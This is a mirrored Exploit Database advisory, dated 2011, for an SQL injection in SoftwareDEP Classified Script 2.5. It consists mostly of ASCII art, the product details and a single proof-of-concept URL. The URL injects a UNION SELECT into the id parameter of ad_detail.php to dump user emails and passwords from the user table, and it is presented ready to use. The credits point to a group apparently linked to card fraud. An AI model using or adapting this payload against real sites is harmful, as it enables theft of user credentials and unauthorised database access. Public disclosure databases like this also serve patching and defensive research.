SoftwareDEP Classified Script 2.5 – SQL Injection (1)

• Exploit Database
• 119 阅读

• 作者： v3n0m
  日期： 2011-08-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17675/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  ) )) ( ( ( (( ) ) ( /(( /( ( ( /(( (( )\ ))\ ))\ ))\ ) )\ ) ( /(( /( )\())\()))\ ))\()) )\)\ )\ (()/(()/(((()/(()/((()/( )\()) )\()) ((_)((_)\(()/( ((_)((((_)((((_)(((_)(/(_))(_)) )\/(_))(_))/(_))(_)\|((_)\ __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))_((_)_ ((_) \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ ||_ _|| \| | |/ / \ V / (_) || (_ |\ V / / _ \| (__ / _ \ | /| |) | _|| / |__ | | | .` | &apos; < |_| \___/\___| |_| /_/ \_\\___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\ .WEB.ID ----------------------------------------------------------------------- SoftwareDEP Classified Script SQL Injection Vulnerability   Author : v3n0m Discovered : August, 16-2011 GMT +7:00 Jakarta, Indonesia Software : Classified Script Developer: http://www.softwaredep.com/ Price: $199 Version: 2.5 Lower versions may also be affected -----------------------------------------------------------------------   PoC: --- http://domain.tld/[path]/ad_detail.php?id=-9999+union+select+1,2,3,4,concat(email,char(58),password),version(),7,8,9,10,11,12,13,14,15,16,17,18,19+from+user--   Credits: ------- www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id